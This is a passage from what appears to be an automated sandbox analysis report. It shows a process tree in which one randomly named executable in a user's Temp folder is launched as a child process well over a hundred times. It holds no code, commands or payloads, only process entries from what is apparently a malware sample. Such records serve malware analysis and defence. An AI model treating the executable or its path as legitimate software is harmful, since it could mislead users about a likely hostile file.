        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8408
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8416
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8424
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8432
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8440
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8448
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8456
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8464
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8472
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8480
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8488
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8496
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8504
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8512
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8524
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8540
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8548
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8556
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8564
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8572
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8580
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8588
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8600
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8612
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8628
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8636
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8644
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8652
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8660
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8668
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8676
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8688
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8696
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8704
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8712
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8720
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8728
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8736
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8744
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8752
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8760
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8768
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8776
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8784
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8792
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8800
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8808
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8816
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8824
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8832
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8840
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8848
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8856
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8864
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8872
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8880
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8888
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8896
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8904
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8912
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8920
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8928
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8936
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8944
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8952
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8960
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8972
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8980
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8988
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8996
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9004
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9012
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9020
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9028
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9036
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9052
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9060
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9068
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9076
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9096
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9104
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9116
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9128
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9136
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9148
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9156
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9168
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9176
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9184
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9192
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9200
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9208
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8340
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8596
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3708
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3976
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:8260
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5932
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4268
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5856
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5428
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:972
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:6076
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4448
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4560
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2072
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4748
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3332
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5464
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9220
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9228
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9236
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9244
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9252
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9260
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9268
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9292
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9300
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9312
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9320
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9328
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9336
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9344
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9352
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9360
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9368
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9376
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9384
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9392
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9400
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9408
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9416
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9424
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9432
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9440
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9452
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9460
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9468
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9476
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9484
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9492
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9500
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9508
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9516
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9524
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9532
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9540
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9548
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9556
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9564
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9572
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9580
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:9588
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
